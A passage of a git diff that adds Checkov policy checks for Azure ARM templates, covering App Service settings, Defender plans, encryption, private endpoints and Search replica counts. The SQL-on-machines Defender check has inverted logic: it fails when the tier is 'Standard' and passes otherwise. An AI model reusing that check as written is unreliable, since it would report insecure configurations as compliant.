+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AppServiceJavaVersion(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that 'Java version' is the latest, if used to run the web app"
+        id = "CKV_AZURE_83"
+        supported_resources = ('Microsoft.Web/sites',)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
+                         missing_block_result=CheckResult.UNKNOWN)
+
+    def get_inspected_key(self) -> str:
+        return "siteConfig/javaVersion"
+
+    def get_expected_value(self) -> Any:
+        return '17'
+
+
+check = AppServiceJavaVersion()
diff --git a/checkov/arm/checks/resource/AppServicePHPVersion.py b/checkov/arm/checks/resource/AppServicePHPVersion.py
new file mode 100644
index 00000000000..196f5463cb9
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServicePHPVersion.py
@@ -0,0 +1,22 @@
+from typing import Any, List
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AppServicePHPVersion(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that 'PHP version' is the latest, if used to run the web app"
+        id = "CKV_AZURE_81"
+        supported_resources = ["Microsoft.Web/sites"]
+        categories = [CheckCategories.GENERAL_SECURITY]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
+                         missing_block_result=CheckResult.UNKNOWN)
+
+    def get_inspected_key(self) -> str:
+        return "properties/siteConfig/phpVersion"
+
+    def get_expected_values(self) -> List[Any]:
+        return ["8.1", "8.2"]
+
+
+check = AppServicePHPVersion()
diff --git a/checkov/arm/checks/resource/AppServicePlanZoneRedundant.py b/checkov/arm/checks/resource/AppServicePlanZoneRedundant.py
new file mode 100644
index 00000000000..3fabdeb2f78
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServicePlanZoneRedundant.py
@@ -0,0 +1,28 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AppServicePlanZoneRedundant(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        """
+        To enhance the resiliency and reliability of business-critical workloads,
+        it's recommended to deploy new App Service Plans with zone-redundancy.
+
+        There's no additional cost associated with enabling availability zones.
+        Pricing for a zone redundant App Service is the same as a single zone App Service.
+        """
+        name = "Ensure the App Service Plan is zone redundant"
+        id = "CKV_AZURE_225"
+        supported_resources = ["Microsoft.Web/serverfarms", ]
+        categories = [CheckCategories.BACKUP_AND_RECOVERY, ]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
+                         missing_block_result=CheckResult.FAILED)
+
+    def get_inspected_key(self) -> str:
+        return "properties/zoneRedundant"
+
+    def get_expected_value(self) -> bool:
+        return True
+
+
+check = AppServicePlanZoneRedundant()
diff --git a/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py b/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py
new file mode 100644
index 00000000000..d6b9a1e5751
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServicePublicAccessDisabled.py
@@ -0,0 +1,26 @@
+from typing import Any
+
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class AppServicePublicAccessDisabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Web App public network access is disabled"
+        id = "CKV_AZURE_222"
+        supported_resources = [
+            "Microsoft.Web/sites",
+            "Microsoft.Web/sites/slots",
+            "Microsoft.Web/sites/config"
+        ]
+        categories = [CheckCategories.NETWORKING,]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/publicNetworkAccess"
+
+    def get_expected_value(self) -> Any:
+        return "Disabled"
+
+
+check = AppServicePublicAccessDisabled()
diff --git a/checkov/arm/checks/resource/AppServicePythonVersion.py b/checkov/arm/checks/resource/AppServicePythonVersion.py
new file mode 100644
index 00000000000..33d62206b09
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServicePythonVersion.py
@@ -0,0 +1,28 @@
+from typing import List, Any
+
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories, CheckResult
+
+
+class AppServicePythonVersion(BaseResourceValueCheck):
+
+    def __init__(self) -> None:
+        name = "Ensure that 'Python version' is the latest, if used to run the web app"
+        id = "CKV_AZURE_82"
+        supported_resources = ("Microsoft.Web/sites",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(
+            name=name,
+            id=id,
+            categories=categories,
+            supported_resources=supported_resources,
+            missing_block_result=CheckResult.UNKNOWN)
+
+    def get_inspected_key(self) -> str:
+        return "properties/siteConfig/pythonVersion"
+
+    def get_expected_values(self) -> List[Any]:
+        return ["3.9", "3.10", "3.11", "3.12"]
+
+
+check = AppServicePythonVersion()
diff --git a/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py b/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py
new file mode 100644
index 00000000000..43347201879
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py
@@ -0,0 +1,21 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AppServiceRemoteDebuggingNotEnabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that remote debugging is not enabled for app services"
+        id = "CKV_AZURE_72"
+        supported_resources = ["Microsoft.Web/sites",]
+        categories = [CheckCategories.GENERAL_SECURITY,]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
+                         missing_block_result=CheckResult.PASSED,)
+
+    def get_inspected_key(self) -> str:
+        return "properties/siteConfig/remoteDebuggingEnabled"
+
+    def get_expected_value(self) -> bool:
+        return False
+
+
+check = AppServiceRemoteDebuggingNotEnabled()
diff --git a/checkov/arm/checks/resource/AppServiceSetHealthCheck.py b/checkov/arm/checks/resource/AppServiceSetHealthCheck.py
new file mode 100644
index 00000000000..a1364bc9115
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceSetHealthCheck.py
@@ -0,0 +1,27 @@
+from typing import Any
+
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.consts import ANY_VALUE
+from checkov.common.models.enums import CheckCategories
+
+
+class AppServiceSetHealthCheck(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        # "Azure App Service monitors a specific path for each web app instance to determine health status.
+        # The monitored path should implement functional checks to determine if the app is performing correctly.
+        # The checks should include dependencies including those that may not be regularly called.
+        # Regular checks of the monitored path allow Azure App Service to route traffic based on availability."
+        name = "Ensure that App Service configures health check"
+        id = "CKV_AZURE_213"
+        supported_resources = ('Microsoft.Web/sites', 'Microsoft.Web/sites/slots',)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return 'properties/siteConfig/healthCheckPath'
+
+    def get_expected_values(self) -> Any:
+        return ANY_VALUE
+
+
+check = AppServiceSetHealthCheck()
diff --git a/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py b/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py
new file mode 100644
index 00000000000..4b318744acd
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py
@@ -0,0 +1,21 @@
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories, CheckResult
+
+
+class AppServiceSlotDebugDisabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure debugging is disabled for the App service slot"
+        id = "CKV_AZURE_155"
+        supported_resources = ('Microsoft.Web/sites/slots', 'Microsoft.Web/sites',)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,
+                         missing_block_result=CheckResult.PASSED)
+
+    def get_inspected_key(self) -> str:
+        return "properties/siteConfig/remoteDebuggingEnabled"
+
+    def get_expected_value(self) -> bool:
+        return False
+
+
+check = AppServiceSlotDebugDisabled()
diff --git a/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py b/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py
new file mode 100644
index 00000000000..1742d9db001
--- /dev/null
+++ b/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py
@@ -0,0 +1,17 @@
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class AppServiceSlotHTTPSOnly(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot"
+        id = "CKV_AZURE_153"
+        supported_resources = ("Microsoft.Web/sites", "Microsoft.Web/sites/slots",)
+        categories = (CheckCategories.NETWORKING,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/httpsOnly"
+
+
+check = AppServiceSlotHTTPSOnly()
diff --git a/checkov/arm/checks/resource/AutomationEncrypted.py b/checkov/arm/checks/resource/AutomationEncrypted.py
new file mode 100644
index 00000000000..fab47e55e58
--- /dev/null
+++ b/checkov/arm/checks/resource/AutomationEncrypted.py
@@ -0,0 +1,20 @@
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+
+
+class AutomationEncrypted(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Automation account variables are encrypted"
+        id = "CKV_AZURE_73"
+        supported_resources = ("Microsoft.Automation/automationAccounts/variables",)
+        categories = (CheckCategories.ENCRYPTION,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/isEncrypted"
+
+    def get_expected_value(self) -> bool:
+        return True
+
+
+check = AutomationEncrypted()
diff --git a/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py b/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py
new file mode 100644
index 00000000000..c29e9797da5
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py
@@ -0,0 +1,22 @@
+from checkov.common.models.consts import ANY_VALUE
+from typing import Any
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AzureBatchAccountUsesKeyVaultEncryption(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Batch account uses key vault to encrypt data"
+        id = "CKV_AZURE_76"
+        supported_resources = ("Microsoft.Batch/batchAccounts",)
+        categories = [CheckCategories.ENCRYPTION]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def get_inspected_key(self) -> str:
+        return "properties/keyVaultReference"
+
+    def get_expected_value(self) -> Any:
+        return ANY_VALUE
+
+
+check = AzureBatchAccountUsesKeyVaultEncryption()
diff --git a/checkov/arm/checks/resource/AzureDataExplorerDoubleEncryptionEnabled.py b/checkov/arm/checks/resource/AzureDataExplorerDoubleEncryptionEnabled.py
new file mode 100644
index 00000000000..916020a0f07
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureDataExplorerDoubleEncryptionEnabled.py
@@ -0,0 +1,21 @@
+from typing import Any
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AzureDataExplorerDoubleEncryptionEnabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name: str = "Ensure that Azure Data Explorer uses double encryption"
+        id: str = "CKV_AZURE_75"
+        supported_resources = ("Microsoft.Kusto/clusters",)
+        categories = (CheckCategories.ENCRYPTION,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "properties/enableDoubleEncryption"
+
+    def get_expected_value(self) -> Any:
+        return True
+
+
+check: Any = AzureDataExplorerDoubleEncryptionEnabled()
diff --git a/checkov/arm/checks/resource/AzureDefenderOnKeyVaults.py b/checkov/arm/checks/resource/AzureDefenderOnKeyVaults.py
new file mode 100644
index 00000000000..0414f225cd4
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureDefenderOnKeyVaults.py
@@ -0,0 +1,31 @@
+from __future__ import annotations
+
+from typing import Any, Dict
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class AzureDefenderOnKeyVaults(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Defender is set to On for Key Vault"
+        id = "CKV_AZURE_87"
+        supported_resources = ("Microsoft.Security/pricings",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties = conf.get('properties', {})
+        pricing_tier = properties.get('pricingTier')
+        name = conf.get('name', '')
+        return (
+            CheckResult.PASSED
+            if pricing_tier == "Standard" and name == 'KeyVaults'
+            else CheckResult.FAILED
+        )
+
+    def get_evaluated_keys(self) -> list[str]:
+        return ["properties.pricingTier", "name"]
+
+
+check = AzureDefenderOnKeyVaults()
diff --git a/checkov/arm/checks/resource/AzureDefenderOnKubernetes.py b/checkov/arm/checks/resource/AzureDefenderOnKubernetes.py
new file mode 100644
index 00000000000..3bb5509a676
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureDefenderOnKubernetes.py
@@ -0,0 +1,26 @@
+from __future__ import annotations
+from typing import Any
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class AzureDefenderOnKubernetes(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Defender is set to On for Kubernetes"
+        id = "CKV_AZURE_85"
+        supported_resources = ("Microsoft.Security/pricings",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources,)
+
+    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+        return (
+            CheckResult.PASSED
+            if conf.get("name") != "KubernetesService" or str(conf["properties"]["pricingTier"]).lower() == "standard"
+            else CheckResult.FAILED
+        )
+
+    def get_evaluated_keys(self) -> list[str]:
+        return ["name", "pricingTier"]
+
+
+check = AzureDefenderOnKubernetes()
diff --git a/checkov/arm/checks/resource/AzureDefenderOnSqlServersVMS.py b/checkov/arm/checks/resource/AzureDefenderOnSqlServersVMS.py
new file mode 100644
index 00000000000..3471e8510d2
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureDefenderOnSqlServersVMS.py
@@ -0,0 +1,31 @@
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+from typing import List, Dict, Any
+
+
+class AzureDefenderOnSqlServersVMS(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Defender is set to On for SQL servers on machines"
+        id = "CKV_AZURE_79"
+        supported_resources = ("Microsoft.Security/pricings",)
+        categories = [CheckCategories.GENERAL_SECURITY]
+        super().__init__(
+            name=name,
+            id=id,
+            categories=categories,
+            supported_resources=supported_resources,
+        )
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties = conf.get("properties", {})
+        name = conf.get("name", "")
+        tier = properties.get("tier")
+        if tier == "Standard" and name == "SqlServerVirtualMachines":
+            return CheckResult.FAILED
+        return CheckResult.PASSED
+
+    def get_evaluated_keys(self) -> List[str]:
+        return ["tier"]
+
+
+check = AzureDefenderOnSqlServersVMS()
diff --git a/checkov/arm/checks/resource/AzureDefenderOnStorage.py b/checkov/arm/checks/resource/AzureDefenderOnStorage.py
new file mode 100644
index 00000000000..ebc2f4ba81a
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureDefenderOnStorage.py
@@ -0,0 +1,27 @@
+from typing import Any, Dict, List
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class AzureDefenderOnStorage(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Defender is set to On for Storage"
+        id = "CKV_AZURE_84"
+        supported_resources = ("Microsoft.Security/pricings",)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties: Dict[str, Any] = conf.get("properties", {})
+        pricingTier = properties.get("pricingTier", "")
+        return (
+            CheckResult.PASSED
+            if pricingTier == "Standard"
+            else CheckResult.FAILED
+        )
+
+    def get_evaluated_keys(self) -> List[str]:
+        return ["properties/pricingTier"]
+
+
+check = AzureDefenderOnStorage()
diff --git a/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py b/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py
new file mode 100644
index 00000000000..3d212a3b09c
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureMLWorkspacePrivateEndpoint.py
@@ -0,0 +1,33 @@
+from typing import Dict, Any
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+from checkov.common.util.consts import START_LINE, END_LINE
+
+
+class AzureMLWorkspacePrivateEndpoint(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure Azure Machine learning workspace is configured with private endpoint"
+        id = "CKV_AZURE_243"
+        supported_resources = ["Microsoft.MachineLearningServices/workspaces"]
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties = conf.get("properties")
+        if isinstance(properties, dict):
+            managed_network = properties.get("managedNetwork")
+            if isinstance(managed_network, dict):
+                ob_rules = managed_network.get("outboundRules")
+                if isinstance(ob_rules, dict):
+                    # check no outbound rule has private endpoint type
+                    for key, rule in ob_rules.items():
+                        if key in [START_LINE, END_LINE]:
+                            # Skip inner fields we add
+                            continue
+                        if rule.get("type") == "PrivateEndpoint":
+                            return CheckResult.PASSED
+        return CheckResult.FAILED
+
+
+check = AzureMLWorkspacePrivateEndpoint()
diff --git a/checkov/arm/checks/resource/AzureSearchSLAIndex.py b/checkov/arm/checks/resource/AzureSearchSLAIndex.py
new file mode 100644
index 00000000000..c13eda686f4
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureSearchSLAIndex.py
@@ -0,0 +1,38 @@
+from __future__ import annotations
+
+from typing import Any, Dict
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class AzureSearchSLAIndex(BaseResourceCheck):
+    def __init__(self) -> None:
+        # Cognitive Search services support indexing and querying. Indexing is the process of loading content into
+        # the service to make it searchable. Querying is the process where a client searches for content
+        # by sending queries to the index.
+        # Cognitive Search supports a configurable number of replicas. Having multiple replicas allows queries and
+        # index updates to load balance across multiple replicas.
+        #
+        # To receive a Service Level Agreement (SLA) for Search index updates a minimum of 3 replicas is required.
+        name = "Ensure that Azure Cognitive Search maintains SLA for index updates"
+        id = "CKV_AZURE_208"
+        supported_resources = ["Microsoft.Search/searchServices", ]
+        categories = [CheckCategories.GENERAL_SECURITY, ]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, Any]) -> CheckResult:
+        properties = conf.get("properties", {})
+        if not isinstance(properties, dict):
+            return CheckResult.FAILED
+        replica_count = properties.get("replicaCount")
+        if replica_count and isinstance(replica_count, int):
+            if replica_count >= 3:
+                return CheckResult.PASSED
+            else:
+                return CheckResult.FAILED
+        else:
+            return CheckResult.FAILED
+
+
+check = AzureSearchSLAIndex()
diff --git a/checkov/arm/checks/resource/AzureSearchSLAQueryUpdates.py b/checkov/arm/checks/resource/AzureSearchSLAQueryUpdates.py
new file mode 100644
index 00000000000..51053028ef1
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureSearchSLAQueryUpdates.py
@@ -0,0 +1,39 @@
+from __future__ import annotations
+
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class AzureSearchSQLQueryUpdates(BaseResourceCheck):
+    def __init__(self) -> None:
+        # Cognitive Search services support indexing and querying. Indexing is the process of loading content
+        # into the service to make it searchable. Querying is the process where a client searches for content
+        # by sending queries to the index.
+        # Cognitive Search supports a configurable number of replicas.
+        # Having multiple replicas allows queries and index updates to load balance across multiple replicas.
+        # To receive a Service Level Agreement (SLA) for Search index queries a minimum of 2 replicas is required.
+        name = "Ensure that Azure Cognitive Search maintains SLA for search index queries"
+        id = "CKV_AZURE_209"
+        supported_resources = ["Microsoft.Search/searchServices", ]
+        categories = [CheckCategories.GENERAL_SECURITY, ]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:
+        self.evaluated_keys = ["properties/replicaCount"]
+
+        properties = conf.get("properties", {})
+        if not isinstance(properties, dict):
+            return CheckResult.FAILED
+        replica_count = properties.get("replicaCount")
+        if replica_count:
+            if not isinstance(replica_count, int):
+                return CheckResult.UNKNOWN
+            if replica_count >= 2:
+                return CheckResult.PASSED
+
+        return CheckResult.FAILED
+
+
+check = AzureSearchSQLQueryUpdates()
diff --git a/checkov/arm/checks/resource/AzureServiceFabricClusterProtectionLevel.py b/checkov/arm/checks/resource/AzureServiceFabricClusterProtectionLevel.py
new file mode 100644
index 00000000000..015d45fa697
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureServiceFabricClusterProtectionLevel.py
@@ -0,0 +1,44 @@
+from typing import Dict, List, Any, Union
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+from checkov.common.util.type_forcers import force_list
+
+
+class AzureServiceFabricClusterProtectionLevel(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensures that Service Fabric use three levels of protection available"
+        id = "CKV_AZURE_125"
+        supported_resources = ('Microsoft.ServiceFabric/clusters',)
+        categories = (CheckCategories.ENCRYPTION,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, List[Any]]) -> CheckResult:
+        properties: Union[List[Any], Dict[str, Any]] = conf.get('properties', {})
+        if not isinstance(properties, dict):
+            self.evaluated_keys = ['properties']
+            return CheckResult.FAILED
+
+        settings_conf = force_list(properties.get('fabricSettings', []))
+        if not isinstance(settings_conf, list):
+            self.evaluated_keys = ['properties/fabricSettings']
+            return CheckResult.FAILED
+
+        for setting in settings_conf:
+            if setting and isinstance(setting, dict) and setting.get('name') == 'Security':
+                params = setting.get('parameters', [{}])
+                if isinstance(params, list) and len(params) > 0 and isinstance(params[0], dict):
+                    param = params[0]
+                    if param.get('name') == 'ClusterProtectionLevel' and param.get('value') == 'EncryptAndSign':
+                        index = settings_conf.index(setting)
+                        self.evaluated_keys = [f'fabricSettings/{index}/parameters/name',
+                                               f'fabricSettings/{index}/parameters/value']
+                        return CheckResult.PASSED
+                else:
+                    self.evaluated_keys = [f'fabricSettings/{settings_conf.index(setting)}/parameters']
+                    return CheckResult.FAILED
+
+        self.evaluated_keys = ['fabricSettings']
+        return CheckResult.FAILED
+
+
+check = AzureServiceFabricClusterProtectionLevel()
diff --git a/checkov/arm/checks/resource/AzureSparkPoolIsolatedComputeEnabled.py b/checkov/arm/checks/resource/AzureSparkPoolIsolatedComputeEnabled.py
new file mode 100644
index 00000000000..ba9a04d3ac3
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureSparkPoolIsolatedComputeEnabled.py
@@ -0,0 +1,17 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class AzureSparkPoolIsolatedComputeEnabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure isolated compute is enabled for Synapse Spark pools"
+        id = "CKV_AZURE_242"
+        supported_resources = ["Microsoft.Synapse/workspaces/bigDataPools"]
+        categories = [CheckCategories.GENERAL_SECURITY]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return 'properties/isComputeIsolationEnabled'
+
+
+check = AzureSparkPoolIsolatedComputeEnabled()
diff --git a/checkov/arm/checks/resource/AzureSynapseWorkspaceVAisEnabled.py b/checkov/arm/checks/resource/AzureSynapseWorkspaceVAisEnabled.py
new file mode 100644
index 00000000000..c84c79fa73c
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureSynapseWorkspaceVAisEnabled.py
@@ -0,0 +1,17 @@
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class SynapseWorkspaceVAisEnabled(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Synapse Workspace vulnerability assessment is enabled"
+        id = "CKV2_AZURE_46"
+        supported_resources = ["Microsoft.Synapse/workspaces/vulnerabilityAssessments"]
+        categories = [CheckCategories.GENERAL_SECURITY]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return 'properties/recurringScans/isEnabled'
+
+
+check = SynapseWorkspaceVAisEnabled()
diff --git a/checkov/arm/checks/resource/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py b/checkov/arm/checks/resource/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py
new file mode 100644
index 00000000000..7c2d0bc94da
--- /dev/null
+++ b/checkov/arm/checks/resource/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.py
@@ -0,0 +1,23 @@
+from typing import Dict, List, Any
+from checkov.common.models.enums import CheckCategories, CheckResult
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Azure Synapse workspaces have no IP firewall rules attached"
+        id = "CKV2_AZURE_19"
+        supported_resources = ["Microsoft.Synapse/workspaces"]
+        categories = [CheckCategories.NETWORKING]
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def scan_resource_conf(self, conf: Dict[str, List[Any]]) -> CheckResult:
+        depends_on = conf.get("dependsOn")
+        if depends_on is None or not len(depends_on):
+            return CheckResult.PASSED
+        if any('Microsoft.Synapse/workspaces/firewallRules' in item for item in depends_on):
+            return CheckResult.FAILED
+        return CheckResult.PASSED
+
+
+check = AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached()
diff --git a/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py b/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py
new file mode 100644
index 00000000000..df85e2f879e
--- /dev/null
+++ b/checkov/arm/checks/resource/CognitiveServicesConfigureIdentity.py
@@ -0,0 +1,22 @@
+from typing import Any
+from checkov.common.models.consts import ANY_VALUE
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class CognitiveServicesConfigureIdentity(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that all Azure Cognitive Services accounts are configured with a managed identity"
+        id = "CKV_AZURE_238"
+        supported_resources = ('Microsoft.CognitiveServices/accounts',)
+        categories = (CheckCategories.GENERAL_SECURITY,)
+        super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+    def get_inspected_key(self) -> str:
+        return "identity/type"
+
+    def get_expected_value(self) -> Any:
+        return ANY_VALUE
+
+
+check = CognitiveServicesConfigureIdentity()
diff --git a/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py b/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py
new file mode 100644
index 00000000000..ff8d0cf86b8
--- /dev/null
+++ b/checkov/arm/checks/resource/CognitiveServicesEnableLocalAuth.py
@@ -0,0 +1,27 @@
+from typing import Any
+
+from checkov.common.models.enums import CheckCategories
+from checkov.arm.base_resource_value_check import BaseResourceValueCheck
+
+
+class CognitiveServicesEnableLocalAuth(BaseResourceValueCheck):
+    def __init__(self) -> None:
+        name = "Ensure that Cognitive Services accounts disable local authentication"
+        id = "CKV_AZURE_236"
+        supported_resources = ('Microsoft.CognitiveServices/accounts', )
+        categories = (CheckCategories.NETWORKING, )
+        super().__init__(
+            name=name,
+            id=id,
+            categories=categories,
+            supported_resources=supported_resources,
+        )
+
+    def get_inspected_key(self) -> str:
+        return 'properties/disableLocalAuth'
+
+    def get_expected_value(self) -> Any:
+        return True
+
+
+check = CognitiveServicesEnableLocalAuth()
diff --git a/checkov/arm/checks/resource/CosmosDBAccountsRestrictedAccess.py b/checkov/arm/checks/resource/CosmosDBAccountsRestrictedAccess.py
new file mode 100644
index 00000000000..2d8d8310b84
--- /dev/null
+++ b/checkov/arm/checks/resource/CosmosDBAccountsRestrictedAccess.py
@@ -0,0 +1,32 @@
+from typing import Dict, Any, Optional
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.arm.base_resource_check import BaseResourceCheck
+
+
+class CosmosDBAccountsRestrictedAccess(BaseResourceCheck):
+    def __init__(self) -> None:
+        name = "Ensure Cosmos DB accounts have restricted access"
+        id = "CKV_AZURE_99"
+        supported_resources = ('Microsoft.DocumentDB/databaseAccounts',)
+        categories = [CheckCategories.NETWORKING]
